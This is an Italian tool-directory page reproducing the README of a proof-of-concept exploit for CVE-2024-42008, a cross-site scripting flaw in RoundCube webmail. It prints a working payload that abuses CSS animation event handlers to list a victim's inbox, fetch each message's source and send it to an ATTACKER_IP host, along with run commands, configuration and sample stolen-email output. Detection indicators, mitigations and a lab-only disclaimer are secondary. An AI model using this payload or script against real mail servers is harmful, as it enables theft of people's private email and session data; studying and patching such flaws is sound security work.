Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Roundcube-CVE-2024-42008-POC | Kitploit
Strumenti/GitHubGitHub/rpgsec/roundcube-cve-2024-42008-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPhishingCTFApprendimento e Formazione
GitHubrpgsec/roundcube-cve-2024-42008-poc

Roundcube-CVE-2024-42008-POC

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-42008 Exploit XSS RoundCube

Panoramica

Questo repository contiene un exploit proof-of-concept per CVE-2024-42008, una vulnerabilità Cross-Site Scripting (XSS) nell'applicazione webmail RoundCube. Questo exploit è progettato per scopi educativi e ambienti di penetration testing controllati come HackTheBox.

Dettagli della vulnerabilità

Riepilogo di CVE-2024-42008

  • CVE ID: CVE-2024-42008
  • Tipo: Cross-Site Scripting (XSS)
  • Punteggio CVSS: Alto
  • Versioni interessate:
    • RoundCube ≤ 1.5.7
    • RoundCube 1.6.x ≤ 1.6.7
  • Versioni corrette: 1.5.8, 1.6.8+

Dettagli tecnici

La vulnerabilità risiede in rcmail_action_mail_get->run() e consente a un attaccante remoto di eseguire JavaScript arbitrario nel browser della vittima. Il difetto deriva da una validazione insufficiente dell'input durante l'elaborazione del contenuto delle email, in particolare nella gestione delle animazioni CSS e dei contesti di esecuzione JavaScript.

Vettore di attacco principale:

  • Contenuto HTML dannoso iniettato tramite moduli di contatto o messaggi di posta elettronica
  • Proprietà di animazione CSS utilizzate per attivare l'esecuzione di JavaScript
  • I gestori di eventi onanimationstart aggirano i filtri dei contenuti
  • Il payload JavaScript viene eseguito nel contesto dell'applicazione webmail

Impatto

Uno sfruttamento riuscito consente agli attaccanti di:

  • Rubare le email della vittima dalla casella di posta (INBOX) e da altre cartelle
  • Esfiltrare i metadati delle email (UID, elenchi di messaggi)
  • Accedere al codice sorgente delle email e agli allegati
  • Inviare email dall'account della vittima
  • Raccogliere credenziali di accesso e token di sessione
  • Eseguire azioni per conto della vittima

Analisi dello script exploit

Architettura dello script

L'exploit è composto da tre componenti principali:

  1. Consegna del payload XSS: invia HTML dannoso tramite modulo di contatto
  2. Server HTTP: resta in ascolto dei dati esfiltrati
  3. Elaborazione dei dati: cattura e registra le email rubate

Analisi del payload

root@kitploit:~
// The core XSS payload uses CSS animations to trigger JavaScript
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=
  // 1. Fetch email list from victim's INBOX
  fetch('/?_task=mail&_action=list&_mbox=INBOX&_page=&_remote=1')
  .then(r=>r.text())
  .then(t=>{
    // 2. Extract email UIDs using regex
    [...t.matchAll(/this\\.add_message_row\\((\\d+),/g)].forEach(m=>{
      // 3. For each email, fetch full source
      fetch(`/?_task=mail&_uid=${m[1]}&_mbox=INBOX&_action=viewsource`)
      .then(r=>r.text())
      .then(data=>{
        // 4. Exfiltrate email data to attacker server
        fetch(`http://ATTACKER_IP:PORT/?data=${encodeURIComponent(data)}`)
      })
    })
  })
; foo=bar">

Caratteristiche principali

  • Operazione continua: può inviare payload a intervalli regolari
  • Modalità stealth: impronta minima e gestione degli errori
  • Registrazione dei dati: cattura e archiviazione automatica delle email esfiltrate
  • Modalità di debug: supporto proxy per l'analisi del traffico
  • Configurabile: molteplici opzioni da riga di comando

Utilizzo

Prerequisiti

root@kitploit:~
pip install requests

Utilizzo di base

root@kitploit:~
# Single payload delivery
python cve-2024-42008-exploit.py

# Continuous mode (every 30 seconds)
python cve-2024-42008-exploit.py -c

# Custom interval (every 60 seconds)
python cve-2024-42008-exploit.py -c -i 60

# Debug mode with proxy
python cve-2024-42008-exploit.py -d

Configurazione

Modifica lo script per configurare:

  • ATTACKER_IP: l'IP del tuo server in ascolto
  • ATTACKER_PORT: la porta per ricevere i dati esfiltrati
  • RECIPIENT_EMAIL: l'indirizzo email target
  • TARGET_URL: istanza RoundCube vulnerabile
  • PROXY: server proxy per il debug (Burp Suite/Caido)

Opzioni della riga di comando

OpzioneDescrizione
-d, --debugAbilita la modalità di debug con supporto proxy
-c, --continuousInvia i payload in modo continuo
-i, --intervalIntervallo tra i payload (default: 30s)

Flusso dell'attacco

  1. Iniezione del payload: lo script invia HTML dannoso tramite modulo di contatto
  2. Consegna dell'email: RoundCube vulnerabile elabora e consegna l'email
  3. Interazione della vittima: l'utente apre/visualizza l'email dannosa
  4. Esecuzione XSS: l'animazione CSS attiva il payload JavaScript
  5. Esfiltrazione dei dati: JavaScript ruba le email e le invia all'attaccante
  6. Cattura dei dati: il server exploit riceve e registra i dati rubati

Rilevamento e mitigazione

Per i difensori

Indicatori di rilevamento:

  • Proprietà di animazione CSS insolite nel contenuto delle email
  • Gestori di eventi onanimationstart nell'HTML
  • JavaScript sospetto nei messaggi email
  • Richieste in uscita verso domini sconosciuti dalla webmail
  • Invii ripetuti di moduli di contatto

Strategie di mitigazione:

  • Aggiornare RoundCube alla versione 1.5.8 o 1.6.8+
  • Implementare una Content Security Policy (CSP)
  • Abilitare il filtraggio dei contenuti delle email
  • Monitorare il traffico in uscita sospetto
  • Audit di sicurezza regolari delle configurazioni webmail

Per i penetration tester

Considerazioni per il test:

  • Assicurarsi di avere la dovuta autorizzazione prima di testare
  • Documentare tutte le attività per il report
  • Testare solo in ambienti isolati
  • Verificare che il target sia intenzionalmente vulnerabile
  • Seguire le pratiche di divulgazione responsabile

Considerazioni legali ed etiche

⚠️ AVVISO: questo exploit è fornito esclusivamente per scopi educativi e test autorizzati.

  • Utilizzare solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione al test
  • Progettato per HackTheBox e piattaforme di apprendimento simili
  • L'uso non autorizzato può violare leggi locali e internazionali
  • Seguire sempre le pratiche di divulgazione responsabile
  • Rispettare la privacy e le normative sulla protezione dei dati

Riferimenti tecnici

  • Voce ufficiale CVE-2024-42008
  • Avviso di sicurezza RoundCube
  • CWE-79: Cross-site Scripting

Esempio di output

root@kitploit:~
[+] Listening on 10.10.14.209:8001 for exfiltrated data...
[2024-07-09 10:30:15] POST Request Sent! Status Code: 200

[+] 📩 Captured Email Data:
Return-Path: <[email protected]>
Received: from localhost (localhost [127.0.0.1])
...
[Email content]
--------------------------------------------------
[+] 🔥 Email data saved to emails.log

Esclusione di responsabilità

Questo codice è fornito esclusivamente per scopi educativi e test di penetrazione autorizzati. Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo software. Assicurati sempre di avere la dovuta autorizzazione prima di testare qualsiasi sistema.

Scarica lo strumento